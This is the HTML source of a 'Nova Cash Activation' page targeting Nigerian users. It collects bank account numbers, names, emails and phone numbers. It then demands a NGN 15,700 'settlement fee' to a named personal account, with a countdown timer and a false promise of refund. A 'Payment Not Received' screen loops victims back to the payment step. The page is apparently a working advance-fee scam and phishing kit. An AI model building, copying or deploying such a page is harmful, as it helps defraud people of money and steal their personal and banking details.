<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Nova Cash Activation</title>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600;700&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="styles.css">
</head>
<body>
    <!-- Page 1: Welcome -->
    <div class="page page-1 active">
        <div class="logo-container">
            <div class="logo">
                <div class="logo-glow"></div>
                <img src="piggy-bank.png" alt="Nova Cash Piggy Bank" class="logo-piggy">
                <div class="logo-coin">N</div>
            </div>
        </div>
        <div class="content-wrapper">
            <h1 class="main-title">NOVA CASH ACTIVATION</h1>
            <p class="subtitle">Welcome to Nova Cash Payment System</p>
            <p class="message">Activate your account and start using NovaCash2025 today!</p>
            <button class="activate-btn" onclick="goToPage(2)">
                <span>ACTIVATE</span>
                <div class="btn-glow"></div>
            </button>
        </div>
        <div class="floating-elements">
            <div class="float-element">💰</div>
            <div class="float-element">💳</div>
            <div class="float-element">🚀</div>
        </div>
    </div>

    <!-- Page 2: Account Activation Form -->
    <div class="page page-2">
        <div class="top-nav">
            <span class="nav-icon">💳</span>
            <h2 style="font-weight: 600;">NOVA CASH ACTIVATION</h2>
        </div>
        <div class="form-container">
            <h2 class="form-title">Activate Your NOVA CASH Account</h2>
            <p class="form-subtitle">Please provide your details to activate your account.</p>
            <form id="activationForm" onsubmit="handleFormSubmit(event)">
                <div class="form-group">
                    <label class="form-label">Account Number</label>
                    <input type="text" class="form-input" placeholder="Enter bank account number" required>
                </div>
                <div class="form-group">
                    <label class="form-label">Full Name</label>
                    <input type="text" class="form-input" placeholder="User's full legal name" required>
                </div>
                <div class="form-group">
                    <label class="form-label">Select Bank</label>
                    <select class="form-select" required>
                        <option value="">Choose your bank</option>
                        <option value="opay">Opay</option>
                        <option value="palmpay">Palmpay</option>
                        <option value="moniepoint">Moniepoint</option>
                        <option value="uba">UBA</option>
                        <option value="gtb">GTBank</option>
                        <option value="access">Access Bank</option>
                        <option value="zenith">Zenith Bank</option>
                        <option value="firstbank">First Bank</option>
                        <option value="fidelity">Fidelity Bank</option>
                        <option value="union">Union Bank</option>
                        <option value="ecobank">Ecobank</option>
                        <option value="fcmb">FCMB</option>
                        <option value="stanbic">Stanbic IBTC</option>
                        <option value="wema">Wema Bank</option>
                        <option value="unity">Unity Bank</option>
                        <option value="heritage">Heritage Bank</option>
                        <option value="keystone">Keystone Bank</option>
                        <option value="polaris">Polaris Bank</option>
                        <option value="titan">Titan Trust Bank</option>
                        <option value="globus">Globus Bank</option>
                        <option value="suntrust">SunTrust Bank</option>
                        <option value="providus">Providus Bank</option>
                        <option value="standard">Standard Chartered</option>
                        <option value="citibank">Citibank Nigeria</option>
                        <option value="lotus">Lotus Bank</option>
                    </select>
                </div>
                <div class="form-group">
                    <label class="form-label">Email Address</label>
                    <input type="email" class="form-input" placeholder="Valid email" required>
                </div>
                <div class="form-group">
                    <label class="form-label">Phone Number</label>
                    <input type="tel" class="form-input" placeholder="Nigerian phone number" required>
                </div>
                <button type="submit" class="submit-btn">Proceed to Payment</button>
            </form>
        </div>
    </div>

    <!-- Page 3: Processing -->
    <div class="page page-3">
        <h2 style="font-size: 1.8rem; margin-bottom: 2rem;">NOVA CASH ACTIVATION</h2>
        <div class="loader"></div>
        <div class="status-text" id="statusText">Processing your information</div>
    </div>

    <!-- Page 4: Payment Instruction -->
    <div class="page page-4">
        <div class="top-bar">
            <span class="nav-icon">💳</span>
            <h2 style="font-weight: 600; color: #6c5ce7;">NOVA CASH ACTIVATION</h2>
        </div>
        <div style="width: 100%; max-width: 500px;">
            <h2 class="form-title">Complete Your Payment</h2>
            <p style="color: #6B7280; margin: 1rem 0;">Make a payment of 15,700 naira to activate your account.</p>
            <p style="color: #6B7280; font-size: 0.9rem; margin-bottom: 1.5rem;">
                A settlement fee of NGN 15,700 is required to authorize withdrawals. This fee will be credited back with your withdrawal once authorized.
            </p>
            
            <div class="timer-row">
                <span>⏰</span>
                <span class="timer" id="countdown">07:00</span>
            </div>
            
            <div class="payment-details">
                <div class="detail-row">
                    <span>👤 Recipient:</span>
                    <span style="font-weight: 600;">JOHN LAWRENCE</span>
                </div>
                <div class="detail-row">
                    <span>💳 Account Number:</span>
                    <div class="copy-wrapper">
                        <span style="font-weight: 600;">7017853915</span>
                        <button class="copy-btn" onclick="copyToClipboard('7017853915', this)" title="Copy account number">
                            <svg width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2">
                                <rect x="9" y="9" width="13" height="13" rx="2" ry="2"></rect>
                                <path d="M5 15H4a2 2 0 0 1-2-2V4a2 2 0 0 1 2-2h9a2 2 0 0 1 2 2v1"></path>
                            </svg>
                        </button>
                    </div>
                </div>
                <div class="detail-row">
                    <span>💰 Amount:</span>
                    <div class="copy-wrapper">
                        <span style="font-weight: 600;">₦15,700</span>
                        <button class="copy-btn" onclick="copyToClipboard('₦15,700', this)" title="Copy amount">
                            <svg width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2">
                                <rect x="9" y="9" width="13" height="13" rx="2" ry="2"></rect>
                                <path d="M5 15H4a2 2 0 0 1-2-2V4a2 2 0 0 1 2-2h9a2 2 0 0 1 2 2v1"></path>
                            </svg>
                        </button>
                    </div>
                </div>
            </div>
            
            <button class="upload-btn" onclick="handleUpload()">Upload your payment receipt</button>
            <button class="proceed-btn" onclick="goToPage(5)">I have made the payment</button>
        </div>
    </div>

    <!-- Page 5: Final Verification -->
    <div class="page page-5">
        <h2 style="font-size: 1.8rem; margin-bottom: 2rem;">NOVA CASH ACTIVATION</h2>
        <div class="loader"></div>
        <div class="status-text" id="finalStatusText">Verifying your payment</div>
    </div>

    <!-- Page 6: Payment Failed -->
    <div class="page page-6">
        <div class="warning-icon">⚠️</div>
        <h2 class="error-title">Payment Not Received</h2>
        <p class="error-message">
            We didn't receive any payment from you. Please retry the payment or contact WhatsApp support.
        </p>
        <button class="retry-btn" onclick="goToPage(4)">Retry Payment</button>
    </div>

    <script src="app.js"></script>
</body>
</html>